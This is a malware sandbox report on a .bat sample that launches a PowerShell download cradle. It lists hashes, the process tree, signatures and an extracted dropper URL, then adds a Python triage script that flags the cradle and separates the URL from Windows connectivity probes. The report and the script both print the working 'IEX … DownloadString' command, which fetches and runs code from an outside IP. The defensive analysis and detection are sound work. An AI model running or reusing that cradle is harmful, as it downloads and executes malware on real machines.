Analysis
max time kernel: 129s
max time network: 66s
platform: windows10_x64
resource: win10v200430
submitted: 01-05-2020 13:10
Static task: static1
Behavioral task: behavioral1
  Sample: 46MBBJZz.bat
  Resource: win7v200430 (windows7_x64)
  0 signatures, 0 seconds
Behavioral task: behavioral2
  Sample: 46MBBJZz.bat
  Resource: win10v200430 (windows10_x64)
  0 signatures, 0 seconds
General
Target: 46MBBJZz.bat
Size: 189B
MD5: c7b71aa9749be55225b17bbaf4b4b9a1
SHA1: ec46d8385341aa2152b70d834c898c5fd9c82284
SHA256: ca27de823967366e96e0623a33820b1713b1e19439c82d81fe6521e04da48dcb
SHA512: 3c0c57b1384957bcf30d3c079c6fc7c4a48be99a2148490e078eaa1809dd87d2e5f047f457cc8c9f2e6518f5ef8177d73f739c27076f45ec5deae04be4590e8d
Score: 10/10
Malware Config
Extracted
Language: ps1
Source: URLs
ps1.dropper: http://185.103.242.78/pastes/46MBBJZz
Signatures
- Makes http(s) request (1 IoC)
  Contacts server via http/https, possibly for C2 communication.
  Processes:
  description: HTTP URL | flow: 4 | ioc: http://www.msftconnecttest.com/connecttest.txt
  Note: this URL is the Windows Network Connectivity Status Indicator probe, issued by the OS itself. It is the only HTTP flow recorded in this run; no request to the extracted dropper URL (http://185.103.242.78/pastes/46MBBJZz) was captured.
- Program crash (1 IoC)
  Processes:
  pid: 2172 (WerFault.exe) | pid_target: 1804 | target process: powershell.exe
- Suspicious use of AdjustPrivilegeToken (3 IoCs)
  Processes:
  Token: SeRestorePrivilege | pid: 2172 | process: WerFault.exe
  Token: SeBackupPrivilege | pid: 2172 | process: WerFault.exe
  Token: SeDebugPrivilege | pid: 2172 | process: WerFault.exe
  Note: all three privilege adjustments are made by WerFault.exe, the Windows Error Reporting process handling the powershell.exe crash, not by the sample's own code.
- Suspicious behavior: EnumeratesProcesses (14 IoCs)
  Processes:
  pid: 2172 | process: WerFault.exe (listed 14 times)
Processes
- C:\Windows\system32\cmd.exe (PID 1492)
  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\46MBBJZz.bat"
  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1804, child of 1492)
    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/46MBBJZz');Invoke-ECMOWU;Start-Sleep -s 10000"
    - C:\Windows\SysWOW64\WerFault.exe (PID 2172, child of 1804)
      C:\Windows\SysWOW64\WerFault.exe -u -p 1804 -s 704
      Program crash
      Suspicious use of AdjustPrivilegeToken
      Suspicious behavior: EnumeratesProcesses
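The process tree above is a textbook PowerShell download cradle: a .bat dropped in the user's Temp directory launches powershell.exe, which fetches a script from a paste URL with WebClient.DownloadString, hands it to IEX, calls a function from it and then sleeps; the PowerShell host then crashes and WerFault.exe picks it up. The triage script below is an added example, not part of the sandbox report or its tooling. It runs over process-creation records constructed from the tree above (PIDs, images and command lines are copied from the report; the dict layout, rule names and the OS-probe allowlist are assumptions), flags the cradle and the .bat launched from Temp, extracts the dropper URL as an IoC, ties the WerFault entry back to the PowerShell PID it was dumping, and separates the Windows connectivity probe from traffic that would actually matter.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional
from urllib.parse import urlparse

# Constructed process-creation records modelled on the sandbox process tree
# above. PIDs, images and command lines are copied from the report; the
# dict layout is an assumption and not any real sensor's schema.
PS_EXE = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
PS_ARGS = ("IEX (New-Object System.Net.WebClient).DownloadString("
           "'http://185.103.242.78/pastes/46MBBJZz');Invoke-ECMOWU;Start-Sleep -s 10000")
EVENTS = [
    {"pid": 1492, "ppid": 0, "image": r"C:\Windows\system32\cmd.exe",
     "cmdline": r'C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\46MBBJZz.bat"'},
    {"pid": 1804, "ppid": 1492, "image": PS_EXE, "cmdline": f'{PS_EXE} "{PS_ARGS}"'},
    {"pid": 2172, "ppid": 1804, "image": r"C:\Windows\SysWOW64\WerFault.exe",
     "cmdline": r"C:\Windows\SysWOW64\WerFault.exe -u -p 1804 -s 704"},
]
# HTTP URL IoCs the sandbox recorded for this run (only the NCSI probe).
HTTP_URLS = ["http://www.msftconnecttest.com/connecttest.txt"]
# Assumed allowlist of hosts the OS itself contacts for connectivity checks.
OS_PROBE_HOSTS = {"www.msftconnecttest.com"}

# Three independent markers of a WebClient download cradle; require two so a
# lone "IEX" in an admin script does not fire on its own.
CRADLE_PATTERNS = (r"\bIEX\b|Invoke-Expression",
                   r"New-Object\s+(System\.)?Net\.WebClient",
                   r"\.DownloadString\(")
URL_RE = re.compile(r"https?://[^\s'\"();]+", re.IGNORECASE)


@dataclass
class Finding:
    pid: int
    rule: str
    urls: List[str] = field(default_factory=list)
    crashed_by: Optional[int] = None  # WerFault PID if the process crashed


def image_name(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def detect_cradle(ev: dict) -> Optional[Finding]:
    """Flag powershell.exe running a download cradle and pull out its URLs."""
    if image_name(ev["image"]) != "powershell.exe":
        return None
    hits = [p for p in CRADLE_PATTERNS if re.search(p, ev["cmdline"], re.IGNORECASE)]
    if len(hits) < 2:
        return None
    return Finding(ev["pid"], "powershell_download_cradle", URL_RE.findall(ev["cmdline"]))


def detect_bat_from_temp(ev: dict) -> Optional[Finding]:
    """Flag cmd.exe /c executing a .bat out of a user's AppData\\Local\\Temp."""
    cl = ev["cmdline"].lower()
    if image_name(ev["image"]) == "cmd.exe" and "\\appdata\\local\\temp\\" in cl and ".bat" in cl:
        return Finding(ev["pid"], "cmd_bat_from_temp")
    return None


def werfault_targets(events) -> dict:
    """Map crashed PID -> WerFault PID from 'WerFault.exe -u -p <pid> -s <n>'."""
    targets = {}
    for ev in events:
        if image_name(ev["image"]) == "werfault.exe":
            m = re.search(r"-p\s+(\d+)", ev["cmdline"])
            if m:
                targets[int(m.group(1))] = ev["pid"]
    return targets


def analyse(events, http_urls) -> dict:
    findings = []
    for ev in events:
        for detector in (detect_bat_from_temp, detect_cradle):
            f = detector(ev)
            if f:
                findings.append(f)
    crashed = werfault_targets(events)
    for f in findings:
        f.crashed_by = crashed.get(f.pid)  # None if the process did not crash
    cradle_urls = {u for f in findings for u in f.urls}
    os_probes = [u for u in http_urls if urlparse(u).hostname in OS_PROBE_HOSTS]
    other = [u for u in http_urls if u not in os_probes]
    return {
        "findings": findings,
        "dropper_urls": sorted(cradle_urls),
        "dropper_urls_seen_in_traffic": sorted(cradle_urls & set(http_urls)),
        "os_probe_urls": os_probes,
        "other_urls": other,
    }


if __name__ == "__main__":
    result = analyse(EVENTS, HTTP_URLS)
    for f in result["findings"]:
        print(f"pid {f.pid}: {f.rule} urls={f.urls} crashed_by={f.crashed_by}")
    print("dropper URLs:", result["dropper_urls"])
    print("dropper URLs seen in traffic:", result["dropper_urls_seen_in_traffic"])
    print("OS probe URLs:", result["os_probe_urls"], "other:", result["other_urls"])
```

On this run the script reports the cradle on PID 1804 with the paste URL as its IoC and marks it as crashed by WerFault PID 2172, while the only observed HTTP URL lands in the OS-probe bucket. That combination (dropper URL extracted from the command line, nothing to it in captured traffic, host process crashed) is what a practitioner should read from the report: the URL is the actionable indicator, and the second-stage script was not observed running here.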